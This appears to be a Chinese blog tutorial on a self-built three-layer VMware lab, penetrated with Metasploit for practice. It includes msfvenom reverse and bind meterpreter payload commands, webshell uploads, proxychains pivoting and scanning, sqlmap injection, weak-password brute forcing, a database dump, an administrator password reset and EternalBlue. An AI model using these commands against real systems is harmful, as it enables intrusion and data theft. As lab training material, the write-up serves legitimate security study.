三层网络靶场搭建&MSF内网渗透

admin 2022年2月5日11:13:20评论118 views字数 2372阅读7分54秒阅读模式

在最近的CTF比赛中,综合靶场出现的次数越来越多,这种形式的靶场和真实的内网渗透很像,很贴合实际工作,但我们往往缺少多层网络的练习环境。本文通过VMware搭建3层网络,并通过msf进行内网渗透,涉及代理搭建,流量转发,端口映射等常见内网渗透技术。

 

网络拓扑

环境搭建

首先在虚拟机中新建3块网卡,选择仅主机模式

将kali设为第一层网络vmnet1

将第一层靶机设为双网卡vmnet1和vmnet2

三层网络靶场搭建&MSF内网渗透

三层网络靶场搭建&MSF内网渗透

将第二层靶机设置为双网卡:vmnet2和vmnet3:

三层网络靶场搭建&MSF内网渗透

三层网络靶场搭建&MSF内网渗透

将第三层靶机设为vmnet3:

三层网络靶场搭建&MSF内网渗透

至此,我们的3层网络环境就已经搭建完毕。

 

第一层靶机

Nmap探测一下,发现8080端口:

三层网络靶场搭建&MSF内网渗透

访问一下:

三层网络靶场搭建&MSF内网渗透

返现文件上传点,经测试没有任何过滤,可以直接上传任意文件,因此直接上传jsp一句话后门:

三层网络靶场搭建&MSF内网渗透

上传后返回文件路径,菜刀连接:

三层网络靶场搭建&MSF内网渗透

为了进一步做内网渗透,上传msf后门:

1、后门制作:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.59.128 LPORT=6666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf >shell.elf

将shell.elf上传到第一层靶机192.168.59.129

2、MSF设置监听:

三层网络靶场搭建&MSF内网渗透

3、在第一层靶机运行shell.elf

Chmod 777 shell.elf
./shell.elf

4、Msf获得meterpreter,执行shell,查看网络配置,发现双网卡,第二层网络段为192.168.80.0/24

三层网络靶场搭建&MSF内网渗透

第二层靶机

首先利用第一层的meterpreter添加到第二层的路由:

run autoroute -s 192.168.80.0/24

三层网络靶场搭建&MSF内网渗透

然后利用msf进行第二层网络存活主机扫描:

use auxiliary/scanner/discovery/arp_sweep

三层网络靶场搭建&MSF内网渗透

发现第二层靶机 192.168.80.129。

接着利用msf搭建socks代理,好让攻击机直接打第二层网络:

use auxiliary/server/socks4a

三层网络靶场搭建&MSF内网渗透

然后在第一层网络配置相关socks4代理客户端:

Proxychain:

在配置文件/etc/proxychains.conf中添加:

socks4 192.168.59.128 9999

然后利用proxychans 启动nmap对第二层靶机进行扫描,这里注意一定要加上-Pn和-sT参数:

proxychains nmap -Pn -sT 192.168.80.129 -p1-1000

三层网络靶场搭建&MSF内网渗透

发现第二层主机开放22和80端口。

在Chrome中配置代理

三层网络靶场搭建&MSF内网渗透

访问第二层网络:

三层网络靶场搭建&MSF内网渗透

是一个typecho的 cms,尝试admin/admin等弱口令登陆后台,登陆成功:

三层网络靶场搭建&MSF内网渗透

个人信息处发现flag:

三层网络靶场搭建&MSF内网渗透

在设置中允许上传php

三层网络靶场搭建&MSF内网渗透

然后撰写文章,附件上传php webshell:

三层网络靶场搭建&MSF内网渗透

可以看到shell路径,用蚁剑连接,因为是第二层网络,所以得通过socks代理客户端去启动蚁剑,我用的是sockscap64:

三层网络靶场搭建&MSF内网渗透

在代理中配置代理服务器:

三层网络靶场搭建&MSF内网渗透

用蚁剑连接shell:

三层网络靶场搭建&MSF内网渗透

在网站根目录处发现flag

查看config.inc.php:

三层网络靶场搭建&MSF内网渗透

发现数据库口令123:

将数据库dump出来:

mysqldump -uroot -p123 typecho >/tmp/1.sql

在1.sql中发现flag:

三层网络靶场搭建&MSF内网渗透

第二层靶机还开放了22端口,尝试利用msf、hydra探测一下弱口令:

Hydra:

三层网络靶场搭建&MSF内网渗透

Msf:

use auxiliary/scanner/ssh/ssh_login

三层网络靶场搭建&MSF内网渗透

三层网络靶场搭建&MSF内网渗透

同样发现弱口令,同时msf可以直接获得一个meterpreter

三层网络靶场搭建&MSF内网渗透

获得flag:

三层网络靶场搭建&MSF内网渗透

在sockscap64中打开ssh客户端:

三层网络靶场搭建&MSF内网渗透

也可以利用root/123456登录,获得flag

三层网络靶场搭建&MSF内网渗透

同样,为了打进第三层,我们需要在第二层靶机上上传msf后门,

制作后门:

msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=4321 -f elf > shell1.elf

利用蚁剑上传,并在第二层靶机运行:

Chmod 777 ./shell1.elf
./shell1.elf

在msf上配置payload:

三层网络靶场搭建&MSF内网渗透

获得第二层meterpreter:

三层网络靶场搭建&MSF内网渗透

发现第三层网段192.168.226.0/24

三层网络靶场搭建&MSF内网渗透

然后利用这个meterpreter添加到第三层的网络路由:

run autoroute -s 192.168.226.0/24

三层网络靶场搭建&MSF内网渗透

在启用一个socks代理给第三层网络,端口开9998

三层网络靶场搭建&MSF内网渗透

然后在proxychains的配置文件中加上9998:

三层网络靶场搭建&MSF内网渗透

扫描一下第三层主机端口:

proxychains nmap -Pn -sT 192.168.226.129 -p1-1000

三层网络靶场搭建&MSF内网渗透

发现开放了80、445端口

 

第三层网络

在chrome 修改代理,端口改为9998

三层网络靶场搭建&MSF内网渗透

访问第三层网络

三层网络靶场搭建&MSF内网渗透

查询处存在SQL注入

三层网络靶场搭建&MSF内网渗透

抓包:

三层网络靶场搭建&MSF内网渗透

Proxychains 跑sqlmap

proxychains sqlmap -r test.txt

三层网络靶场搭建&MSF内网渗透

得到后台用户密码:admin/faka123

三层网络靶场搭建&MSF内网渗透

登录:

三层网络靶场搭建&MSF内网渗透

发现flag。接着在logo上传处发现任意文件上传:

三层网络靶场搭建&MSF内网渗透

直接上传木马,获得路径:

三层网络靶场搭建&MSF内网渗透

菜刀连接,网站根目录发现flag

三层网络靶场搭建&MSF内网渗透

发现网站开启了3389,同时是system权限:

三层网络靶场搭建&MSF内网渗透

三层网络靶场搭建&MSF内网渗透

直接修改administrator密码:

net user administrator 123456

再把第三层3389流量转发到代理服务器中:

三层网络靶场搭建&MSF内网渗透

访问远程桌面:

三层网络靶场搭建&MSF内网渗透

发现flag:

三层网络靶场搭建&MSF内网渗透

同时,该靶机开放445端口,试试永痕之蓝:

三层网络靶场搭建&MSF内网渗透

三层网络靶场搭建&MSF内网渗透

同样可以拿到shell。

至此,我们已经拿下3层网络中的全部机器。

推荐阅读

三层网络靶场搭建&MSF内网渗透

三层网络靶场搭建&MSF内网渗透

往期推荐

干货|渗透测试、安全考证、编程技术相关资料等

实战disable_functions绕过拿下WindowsR2

实战|CVE到内网然后拿下4个域控

内网工具|读取正反向连接RDP记录

干货|SQL注入思路总结

如何搭建一台永久运行的个人渗透服务器?

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年2月5日11:13:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   三层网络靶场搭建&MSF内网渗透https://cn-sec.com/archives/765766.html

发表评论

匿名网友 填写信息